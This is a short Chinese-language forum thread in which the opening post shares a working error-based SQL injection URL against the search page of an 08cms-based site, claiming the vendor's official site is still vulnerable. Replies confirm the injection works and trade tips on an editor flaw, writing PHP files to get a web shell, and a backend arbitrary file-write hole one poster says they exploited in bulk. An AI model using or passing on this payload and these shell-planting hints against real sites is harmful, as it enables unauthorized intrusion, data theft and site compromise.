以前看到的,测试下官网还可以。网上看到还没有,大牛们估计早收好了。
可能是没有开源漏洞挺多的。
http://www.8090sec.com/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366
众说纷纭:测试成功。>>>>>> 貌似还有个编辑器的漏洞。。 >>>>>> iis6和apache可以编辑模板。其他没试过。 >>>>> 刚碰到了个08cms, 感谢分享。>>>>> 日烂了,getshell 哪里需要解析。直接写入PHP文件 >>>>>> 日烂了,getshell 哪里需要解析。直接写入PHP文件 >>>>> 偶尔碰到过,房产版的有的已经补了,不过官方的没去看过... >>>>> 不开源的估计东东很多。 >>>>> 后台那里有个地方可以把文件名 写入到任意目录任意文件的。去年批量过一次,你看下是先写入后修改还是直接新建。而且08cms分很多个类型。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;